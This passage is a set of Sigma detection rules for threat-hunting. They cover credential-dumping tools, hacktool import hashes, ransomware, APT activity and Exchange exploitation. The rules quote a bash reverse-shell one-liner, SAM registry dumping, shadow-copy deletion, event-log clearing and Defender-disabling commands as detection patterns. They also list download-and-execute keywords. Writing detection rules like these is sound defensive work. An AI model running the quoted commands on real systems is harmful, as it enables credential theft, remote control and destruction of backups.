    Detects the use of Windows Credential Editor (WCE), a popular post-exploitation tool used to extract plaintext passwords, hash, PIN code and Kerberos tickets from memory.
    It is often used by threat actors for credential dumping and lateral movement within compromised networks.
references:
    - https://www.ampliasecurity.com/research/windows-credentials-editor/
author: Florian Roth (Nextron Systems)
date: 2019-12-31
modified: 2025-10-21
tags:
    - attack.credential-access
    - attack.t1003.001
    - attack.s0005
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        Image|endswith:
            - '\WCE.exe'
            - '\WCE64.exe'
    selection_hash:
        Hashes|contains:
            - 'IMPHASH=136F0A8572C058A96436C82E541E4C41'
            - 'IMPHASH=589657C64DDE88533186C39F82FA1F50'
            - 'IMPHASH=6BFE09EFCB4FFDE061EBDBAFC4DB84CF'
            - 'IMPHASH=7D490037BF450877E6D0287BDCFF8D2E'
            - 'IMPHASH=8AB93B061287C79F3088C5BC7E7D97ED'
            - 'IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F'
            - 'IMPHASH=BA434A7A729EEC20E136CA4C32D6C740'
            - 'IMPHASH=BD1D1547DA13C0FCB6C15E86217D5EB8'
            - 'IMPHASH=E96A73C7BF33A464C510EDE582318BF2'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: critical

title: Hacktool Execution - Imphash
id: 24e3e58a-646b-4b50-adef-02ef935b9fc8
status: test
description: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed
references:
    - Internal Research
author: Florian Roth (Nextron Systems)
date: 2022-03-04
modified: 2024-11-23
tags:
    - attack.credential-access
    - attack.resource-development
    - attack.t1588.002
    - attack.t1003
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Hashes|contains: # Sysmon field hashes contains all types
            - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam
            - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam
            - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam
            - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato
            - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato
            - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG
            - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato
            - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato
            - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato
            - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato
            - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump
            - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump
            - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump
            - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump
            - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump
            - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump
            - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump
            - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump
            - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump
            - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX
            - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump
            - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump
            - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump
            - IMPHASH=730073214094CD328547BF1F72289752 # Htran
            - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons
            - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons
            - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons
            - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons
            - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump
            - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump
            - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump
            - IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29 # NanoDump
            - IMPHASH=4DA924CF622D039D58BCE71CDF05D242 # NanoDump
            - IMPHASH=E7A3A5C377E2D29324093377D7DB1C66 # NanoDump
            - IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF # NanoDump
            - IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE # NanoDump
            - IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4 # NanoDump
            - IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338 # NanoDump
            - IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E # NanoDump
            - IMPHASH=E6F9D5152DA699934B30DAAB206471F6 # NanoDump
            - IMPHASH=3AD59991CCF1D67339B319B15A41B35D # NanoDump
            - IMPHASH=FFDD59E0318B85A3E480874D9796D872 # NanoDump
            - IMPHASH=0CF479628D7CC1EA25EC7998A92F5051 # NanoDump
            - IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51 # NanoDump
            - IMPHASH=D6D0F80386E1380D05CB78E871BC72B1 # NanoDump
            - IMPHASH=38D9E015591BBFD4929E0D0F47FA0055 # HandleKatz
            - IMPHASH=0E2216679CA6E1094D63322E3412D650 # HandleKatz
            - IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB # DripLoader
            - IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798 # DripLoader
            - IMPHASH=11083E75553BAAE21DC89CE8F9A195E4 # DripLoader
            - IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80 # DripLoader
            - IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F # CreateMiniDump
            - IMPHASH=767637C23BB42CD5D7397CF58B0BE688 # UACMe Akagi
            - IMPHASH=14C4E4C72BA075E9069EE67F39188AD8 # UACMe Akagi
            - IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC # UACMe Akagi
            - IMPHASH=7D010C6BB6A3726F327F7E239166D127 # UACMe Akagi
            - IMPHASH=89159BA4DD04E4CE5559F132A9964EB3 # UACMe Akagi
            - IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F # UACMe Akagi
            - IMPHASH=5834ED4291BDEB928270428EBBAF7604 # UACMe Akagi
            - IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38 # UACMe Akagi
            - IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894 # UACMe Akagi
            - IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74 # UACMe Akagi
            - IMPHASH=3DE09703C8E79ED2CA3F01074719906B # UACMe Akagi
            - IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F # WCE
            - IMPHASH=E96A73C7BF33A464C510EDE582318BF2 # WCE
            - IMPHASH=32089B8851BBF8BC2D014E9F37288C83 # Sliver Stagers
            - IMPHASH=09D278F9DE118EF09163C6140255C690 # Dumpert
            - IMPHASH=03866661686829d806989e2fc5a72606 # Dumpert
            - IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d # Dumpert
            - IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE # SysmonEnte
            - IMPHASH=19584675D94829987952432E018D5056 # SysmonQuiet
            - IMPHASH=330768A4F172E10ACB6287B87289D83B # ShaprEvtMute Hook
            - IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313 # Forkatz
            - IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC # PPLKiller
            - IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28 # PPLKiller
            - IMPHASH=96DF3A3731912449521F6F8D183279B1 # Backstab
            - IMPHASH=7E6CF3FF4576581271AC8A313B2AAB46 # Backstab
            - IMPHASH=51791678F351C03A0EB4E2A7B05C6E17 # Backstab
            - IMPHASH=25CE42B079282632708FC846129E98A5 # Forensia
            - IMPHASH=021BCCA20BA3381B11BDDE26B4E62F20 # EDRSandBlast
            - IMPHASH=59223B5F52D8799D38E0754855CBDF42 # EDRSandBlast
            - IMPHASH=81E75D8F1D276C156653D3D8813E4A43 # EDRSandBlast
            - IMPHASH=17244E8B6B8227E57FE709CCAD421420 # EDRSandBlast
            - IMPHASH=5B76DA3ACDEDC8A5CDF23A798B5936B4 # EDRSandBlast
            - IMPHASH=CB2B65BB77D995CC1C0E5DF1C860133C # EDRSandBlast
            - IMPHASH=40445337761D80CF465136FAFB1F63E6 # EDRSandBlast
            - IMPHASH=8A790F401B29FA87BC1E56F7272B3AA6 # EDRSilencer
            - IMPHASH=B50199E952C875241B9CE06C971CE3C1 # EventLogCrasher
    condition: selection
falsepositives:
    - Legitimate use of one of these tools
level: critical

title: InstallerFileTakeOver LPE CVE-2021-41379 File Create Event
id: 3be82d5d-09fe-4d6a-a275-0d40d234d324
status: test
description: Detects signs of the exploitation of LPE CVE-2021-41379 that include an msiexec process that creates an elevation_service.exe file
references:
    - https://web.archive.org/web/20220421061949/https://github.com/klinix5/InstallerFileTakeOver
    - https://www.zerodayinitiative.com/advisories/ZDI-21-1308/
author: Florian Roth (Nextron Systems)
date: 2021-11-22
modified: 2022-12-25
tags:
    - attack.privilege-escalation
    - attack.t1068
    - detection.emerging-threats
logsource:
    category: file_event
    product: windows
detection:
    selection:
        Image|endswith: '\msiexec.exe'
        TargetFilename|startswith: 'C:\Program Files (x86)\Microsoft\Edge\Application'
        TargetFilename|endswith: '\elevation_service.exe'
    condition: selection
falsepositives:
    - Unknown
    - Possibly some Microsoft Edge upgrades
level: critical

title: Lazarus Group Activity
id: 24c4d154-05a4-4b99-b57d-9b977472443a
related:
    - id: 7b49c990-4a9a-4e65-ba95-47c9cc448f6e
      type: obsolete
status: test
description: Detects different process execution behaviors as described in various threat reports on Lazarus group activity
references:
    - https://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/
    - https://www.hvs-consulting.de/lazarus-report/
author: Florian Roth (Nextron Systems), wagga
date: 2020-12-23
modified: 2023-03-10
tags:
    - attack.g0032
    - attack.execution
    - attack.t1059
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_generic:
        CommandLine|contains:
            - 'reg.exe save hklm\sam %temp%\~reg_sam.save'
            - '1q2w3e4r@#$@#$@#$'
            - ' -hp1q2w3e4 '
            - '.dat data03 10000 -p '
    selection_netstat:
        CommandLine|contains|all:
            - 'netstat -aon | find '
            - 'ESTA'
            - ' > %temp%\~'
    # Network share discovery
    selection_network_discovery:
        CommandLine|contains|all:
            - '.255 10 C:\ProgramData\IBM\'
            - '.DAT'
    selection_persistence:
        CommandLine|contains|all:
            - ' /c '
            - ' -p 0x'
        CommandLine|contains:
            - 'C:\ProgramData\'
            - 'C:\RECYCLER\'
    selection_rundll32:
        CommandLine|contains|all:
            - 'rundll32 '
            - 'C:\ProgramData\'
        CommandLine|contains:
            - '.bin,'
            - '.tmp,'
            - '.dat,'
            - '.io,'
            - '.ini,'
            - '.db,'
    condition: 1 of selection_*
falsepositives:
    - Unlikely
level: critical

title: Leviathan Registry Key Activity
id: 70d43542-cd2d-483c-8f30-f16b436fd7db
status: test
description: Detects registry key used by Leviathan APT in Malaysian focused campaign
references:
    - https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign
author: Aidan Bracher
date: 2020-07-07
modified: 2023-09-19
tags:
    - attack.privilege-escalation
    - attack.persistence
    - attack.t1547.001
    - detection.emerging-threats
logsource:
    category: registry_event
    product: windows
detection:
    selection:
        TargetObject|contains: '\Software\Microsoft\Windows\CurrentVersion\Run\ntkd'
    condition: selection
level: critical

title: Linux Reverse Shell Indicator
id: 83dcd9f6-9ca8-4af7-a16e-a1c7a6b51871
status: test
description: Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
references:
    - https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
author: Florian Roth (Nextron Systems)
date: 2021-10-16
modified: 2022-12-25
tags:
    - attack.execution
    - attack.t1059.004
logsource:
    product: linux
    category: network_connection
detection:
    selection:
        Image|endswith: '/bin/bash'
    filter:
        DestinationIp:
            - '127.0.0.1'
            - '0.0.0.0'
    condition: selection and not filter
falsepositives:
    - Unknown
level: critical

title: LockerGoga Ransomware Activity
id: 74db3488-fd28-480a-95aa-b7af626de068
status: stable
description: Detects LockerGoga ransomware activity via specific command line.
references:
    - https://medium.com/@malwaredancer/lockergoga-input-arguments-ipc-communication-and-others-bd4e5a7ba80a
    - https://blog.f-secure.com/analysis-of-lockergoga-ransomware/
    - https://www.carbonblack.com/blog/tau-threat-intelligence-notification-lockergoga-ransomware/
author: Vasiliy Burov, oscd.community
date: 2020-10-18
modified: 2023-02-03
tags:
    - attack.impact
    - attack.t1486
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains: '-i SM-tgytutrc -s'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: Mailbox Export to Exchange Webserver
id: 516376b4-05cd-4122-bae0-ad7641c38d48
status: test
description: Detects a successful export of an Exchange mailbox to untypical directory or with aspx name suffix which can be used to place a webshell or the needed role assignment for it
references:
    - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html
author: Florian Roth (Nextron Systems), Rich Warren, Christian Burkard (Nextron Systems)
date: 2021-08-09
modified: 2023-04-30
tags:
    - attack.persistence
    - attack.t1505.003
logsource:
    service: msexchange-management
    product: windows
detection:
    export_command:
        '|all':
            - 'New-MailboxExportRequest'
            - ' -Mailbox '
    export_params:
        - '-FilePath "\\\\' # We care about any share location.
        - '.aspx'
    role_assignment:
        '|all':
            - 'New-ManagementRoleAssignment'
            - ' -Role "Mailbox Import Export"'
            - ' -User '
    condition: (export_command and export_params) or role_assignment
falsepositives:
    - Unlikely
level: critical

title: Malicious DLL Load By Compromised 3CXDesktopApp
id: d0b65ad3-e945-435e-a7a9-438e62dd48e9
related:
    - id: 3c4b3bbf-36b4-470c-b6cf-f07e8b1c7e26 # Proxy C2
      type: similar
    - id: 76bc1601-9546-4b75-9419-06e0e8d10651 # Proxy GH
      type: similar
    - id: bd03a0dc-5d93-49eb-b2e8-2dfd268600f8 # DNS C2
      type: similar
    - id: 51eecf75-d069-43c7-9ea2-63f75499edd4 # net_connection C2
      type: similar
    - id: 93bbde78-dc86-4e73-9ffc-ff8a384ca89c # ProcCreation Exec
      type: similar
    - id: 63f3605b-979f-48c2-b7cc-7f90523fed88 # ProcCreation ChildProc
      type: similar
    - id: e7581747-1e44-4d4b-85a6-0db0b4a00f2a # ProcCreation Update
      type: similar
status: test
description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
references:
    - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-03-31
modified: 2024-11-23
tags:
    - detection.emerging-threats
    - attack.stealth
logsource:
    category: image_load
    product: windows
detection:
    selection:
        Hashes|contains:
            # ffmpeg.dll
            - 'SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896'
            - 'SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429'
            - 'MD5=74BC2D0B6680FAA1A5A76B27E5479CBC'
            # d3dcompiler_47.dll
            - 'SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03'
            - 'SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E'
            - 'MD5=82187AD3F0C6C225E2FBA0C867280CC9'
            # Inner object from ffmpeg.dll
            - 'SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952'
            - 'SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30'
            - 'MD5=11BC82A9BD8297BD0823BCE5D6202082'
            # ICONIC Stealer payload
            - 'SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423'
            - 'SHA1=3B3E778B647371262120A523EB873C20BB82BEAF'
            - 'MD5=7FAEA2B01796B80D180399040BB69835'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: Malicious Named Pipe Created
id: fe3ac066-98bb-432a-b1e7-a5229cb39d4a
status: test
description: Detects the creation of a named pipe seen used by known APTs or malware.
references:
    - https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/
    - https://securelist.com/faq-the-projectsauron-apt/75533/
    - https://web.archive.org/web/20180725233601/https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf
    - https://www.us-cert.gov/ncas/alerts/TA17-117A
    - https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html
    - https://thedfirreport.com/2020/06/21/snatch-ransomware/
    - https://github.com/RiccardoAncarani/LiquidSnake
    - https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity
    - https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a
    - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
    - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
    - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
author: Florian Roth (Nextron Systems), blueteam0ps, elhoim
date: 2017-11-06
modified: 2023-08-07
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
logsource:
    product: windows
    category: pipe_created
    definition: 'Note that you have to configure logging for Named Pipe Events in Sysmon config (Event ID 17 and Event ID 18). The basic configuration is in popular sysmon configuration (https://github.com/SwiftOnSecurity/sysmon-config), but it is worth verifying. You can also use other repo, e.g. https://github.com/Neo23x0/sysmon-config, https://github.com/olafhartong/sysmon-modular. How to test detection? You can check powershell script from this site https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575'
detection:
    selection:
        PipeName:
            - '\46a676ab7f179e511e30dd2dc41bd388'  # Project Sauron
            - '\583da945-62af-10e8-4902-a8f205c72b2e'  # SolarWinds SUNBURST malware
            - '\6e7645c4-32c5-4fe3-aabf-e94c2f4370e7'  # LiquidSnake
            - '\9f81f59bc58452127884ce513865ed20'  # Project Sauron
            - '\adschemerpc'  # Turla HyperStack
            - '\ahexec'  # Sofacy group malware
            - '\AnonymousPipe'  # Hidden Cobra Hoplight
            - '\bc31a7'  # Pacifier
            - '\bc367'  # Pacifier
            - '\bizkaz'  # Snatch Ransomware
            - '\csexecsvc' # CSEXEC default
            - '\dce_3d' # Qbot
            - '\e710f28d59aa529d6792ca6ff0ca1b34'  # Project Sauron
            - '\gruntsvc' # Covenant default
            - '\isapi_dg'  # Uroburos Malware
            - '\isapi_dg2'  # Uroburos Malware
            - '\isapi_http'  # Uroburos Malware
            - '\jaccdpqnvbrrxlaf' # PoshC2 default
            - '\lsassw'  # Wild Neutron APT malware
            - '\NamePipe_MoreWindows'  # Cloud Hopper - RedLeaves
            - '\pcheap_reuse'  # Pipe used by Equation Group malware
            - '\Posh*' # PoshC2 default
            - '\rpchlp_3'  # Project Sauron
            - '\sdlrpc'  # Cobra Trojan
            - '\svcctl' # Crackmapexec smbexec default
            - '\testPipe'  # Emissary Panda Hyperbro
            - '\winsession'  # Wild Neutron APT malware
            # - '\status_*' # CS default  https://github.com/SigmaHQ/sigma/issues/253
    condition: selection
falsepositives:
    - Unknown
level: critical

title: Mint Sandstorm - AsperaFaspex Suspicious Process Execution
id: 91048c0d-5b81-4b85-a099-c9ee4fb87979
status: test
description: Detects suspicious execution from AsperaFaspex as seen used by Mint Sandstorm
references:
    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|contains|all:
            - 'aspera'
            - '\ruby'
    selection_special_child_powershell_img:
        Image|endswith:
            - '\powershell.exe'
            - '\powershell_ise.exe'
    selection_special_child_powershell_cli:
        - CommandLine|contains:
              - ' echo '
              - '-dumpmode'
              - '-ssh'
              - '.dmp'
              - 'add-MpPreference'
              - 'adscredentials'
              - 'bitsadmin'
              - 'certutil'
              - 'csvhost.exe'
              - 'DownloadFile'
              - 'DownloadString'
              - 'dsquery'
              - 'ekern.exe'
              - 'FromBase64String'
              - 'iex '
              - 'iex('
              - 'Invoke-Expression'
              - 'Invoke-WebRequest'
              - 'localgroup administrators'
              - 'o365accountconfiguration'
              - 'samaccountname='
              - 'set-MpPreference'
              - 'svhost.exe'
              - 'System.IO.Compression'
              - 'System.IO.MemoryStream'
              - 'usoprivate'
              - 'usoshared'
              - 'whoami'
        - CommandLine|re:
              - '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
              - 'net\s+user'
              - 'net\s+group'
              - 'query\s+session'
    selection_special_child_lsass_1:
        CommandLine|contains: 'lsass'
    selection_special_child_lsass_2:
        CommandLine|contains:
            - 'procdump'
            - 'tasklist'
            - 'findstr'
    selection_child_wget:
        Image|endswith: '\wget.exe'
        CommandLine|contains: 'http'
    selection_child_curl:
        Image|endswith: '\curl.exe'
        CommandLine|contains: 'http'
    selection_child_script:
        CommandLine|contains:
            - 'E:jscript'
            - 'e:vbscript'
    selection_child_localgroup:
        CommandLine|contains|all:
            - 'localgroup Administrators'
            - '/add'
    selection_child_net:
        CommandLine|contains: 'net' # Covers net1
        CommandLine|contains|all:
            - 'user'
            - '/add'
    selection_child_reg:
        - CommandLine|contains|all:
              - 'reg add'
              - 'DisableAntiSpyware'
              - '\Microsoft\Windows Defender'
        - CommandLine|contains|all:
              - 'reg add'
              - 'DisableRestrictedAdmin'
              - 'CurrentControlSet\Control\Lsa'
    selection_child_wmic_1:
        CommandLine|contains|all:
            - 'wmic'
            - 'process call create'
    selection_child_wmic_2:
        CommandLine|contains|all:
            - 'wmic'
            - 'delete'
            - 'shadowcopy'
    selection_child_vssadmin:
        CommandLine|contains|all:
            - 'vssadmin'
            - 'delete'
            - 'shadows'
    selection_child_wbadmin:
        CommandLine|contains|all:
            - 'wbadmin'
            - 'delete'
            - 'catalog'
    condition: selection_parent and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*)
falsepositives:
    - Unlikely
level: critical

title: Mint Sandstorm - ManageEngine Suspicious Process Execution
id: 58d8341a-5849-44cd-8ac8-8b020413a31b
status: test
description: Detects suspicious execution from ManageEngine as seen used by Mint Sandstorm
references:
    - https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/
author: Nasreddine Bencherchali (Nextron Systems), MSTIC (idea)
date: 2023-04-20
modified: 2025-10-19
tags:
    - attack.execution
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent_path:
        ParentImage|contains:
            - 'manageengine'
            - 'ServiceDesk'
    selection_parent_image:
        ParentImage|contains: '\java'
    selection_special_child_powershell_img:
        Image|endswith:
            - '\powershell.exe'
            - '\powershell_ise.exe'
    selection_special_child_powershell_cli:
        - CommandLine|contains:
              - ' echo '
              - '-dumpmode'
              - '-ssh'
              - '.dmp'
              - 'add-MpPreference'
              - 'adscredentials'
              - 'bitsadmin'
              - 'certutil'
              - 'csvhost.exe'
              - 'DownloadFile'
              - 'DownloadString'
              - 'dsquery'
              - 'ekern.exe'
              - 'FromBase64String'
              - 'iex '
              - 'iex('
              - 'Invoke-Expression'
              - 'Invoke-WebRequest'
              - 'localgroup administrators'
              - 'o365accountconfiguration'
              - 'samaccountname='
              - 'set-MpPreference'
              - 'svhost.exe'
              - 'System.IO.Compression'
              - 'System.IO.MemoryStream'
              - 'usoprivate'
              - 'usoshared'
              - 'whoami'
        - CommandLine|re: '[-/–][Ee^]{1,2}[ncodema^]*\s[A-Za-z0-9+/=]{15,}'
        - CommandLine|re: 'net\s+user'
        - CommandLine|re: 'net\s+group'
        - CommandLine|re: 'query\ssession'
    selection_special_child_lsass_1:
        CommandLine|contains: 'lsass'
    selection_special_child_lsass_2:
        CommandLine|contains:
            - 'procdump'
            - 'tasklist'
            - 'findstr'
    selection_child_wget:
        Image|endswith: '\wget.exe'
        CommandLine|contains: 'http'
    selection_child_curl:
        Image|endswith: '\curl.exe'
        CommandLine|contains: 'http'
    selection_child_script:
        CommandLine|contains:
            - 'E:jscript'
            - 'e:vbscript'
    selection_child_localgroup:
        CommandLine|contains|all:
            - 'localgroup Administrators'
            - '/add'
    selection_child_net:
        CommandLine|contains: 'net' # Covers net1
        CommandLine|contains|all:
            - 'user'
            - '/add'
    selection_child_reg:
        - CommandLine|contains|all:
              - 'reg add'
              - 'DisableAntiSpyware'
              - '\Microsoft\Windows Defender'
        - CommandLine|contains|all:
              - 'reg add'
              - 'DisableRestrictedAdmin'
              - 'CurrentControlSet\Control\Lsa'
    selection_child_wmic_1:
        CommandLine|contains|all:
            - 'wmic'
            - 'process call create'
    selection_child_wmic_2:
        CommandLine|contains|all:
            - 'wmic'
            - 'delete'
            - 'shadowcopy'
    selection_child_vssadmin:
        CommandLine|contains|all:
            - 'vssadmin'
            - 'delete'
            - 'shadows'
    selection_child_wbadmin:
        CommandLine|contains|all:
            - 'wbadmin'
            - 'delete'
            - 'catalog'
    filter_main:
        CommandLine|contains|all:
            - 'download.microsoft.com'
            - 'manageengine.com'
            - 'msiexec'
    condition: all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main
falsepositives:
    - Unlikely
level: critical

title: Moriya Rootkit - System
id: 25b9c01c-350d-4b95-bed1-836d04a4f324
status: test
description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
references:
    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2022-11-29
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.003
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Service Control Manager'
        EventID: 7045
        ServiceName: ZzNetSvc
    condition: selection
falsepositives:
    - Unknown
level: critical

title: Moriya Rootkit File Created
id: a1507d71-0b60-44f6-b17c-bf53220fdd88
related:
    - id: 25b9c01c-350d-4b95-bed1-836d04a4f324
      type: derived
status: test
description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
references:
    - https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2023-05-05
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.t1543.003
    - detection.emerging-threats
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys'
    condition: selection
falsepositives:
    - Unknown
level: critical

title: NotPetya Ransomware Activity
id: 79aeeb41-8156-4fac-a0cd-076495ab82a1
status: test
description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
references:
    - https://securelist.com/schroedingers-petya/78870/
    - https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100
author: Florian Roth (Nextron Systems), Tom Ueltschi
date: 2019-01-16
modified: 2022-12-15
tags:
    - attack.stealth
    - attack.defense-impairment
    - attack.t1218.011
    - attack.t1685.005
    - attack.credential-access
    - attack.t1003.001
    - car.2016-04-002
    - detection.emerging-threats
logsource:
    category: process_creation
    product: windows
detection:
    selection_specific_pattern:
        CommandLine|contains:
            - 'wevtutil cl Application & fsutil usn deletejournal /D C:'
            - 'dllhost.dat %WINDIR%\ransoms'
    selection_rundll32:
        Image|endswith: '\rundll32.exe'
        CommandLine|endswith:
            - '.dat,#1'
            - '.dat #1' # Sysmon removes comma
            - '.zip.dll",#1'
    selection_perfc_keyword:
        - '\perfc.dat'
    condition: 1 of selection_*
falsepositives:
    - Unknown
level: critical

title: OWASSRF Exploitation Attempt Using Public POC - Proxy
id: fdd7e904-7304-4616-a46a-e32f917c4be4
status: test
description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
references:
    - https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
    - https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
    - https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-22
tags:
    - attack.initial-access
    - attack.t1190
    - detection.emerging-threats
logsource:
    category: proxy
detection:
    selection:
        # Look for the header: X-OWA-ExplicitLogonUser: owa/[email protected]
        c-useragent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'
        cs-method: 'POST'
        sc-status: 200
        c-uri|contains|all:
            - '/owa/mastermailbox'
            - '/powershell'
    condition: selection
falsepositives:
    - Unlikely
level: critical

title: OWASSRF Exploitation Attempt Using Public POC - Webserver
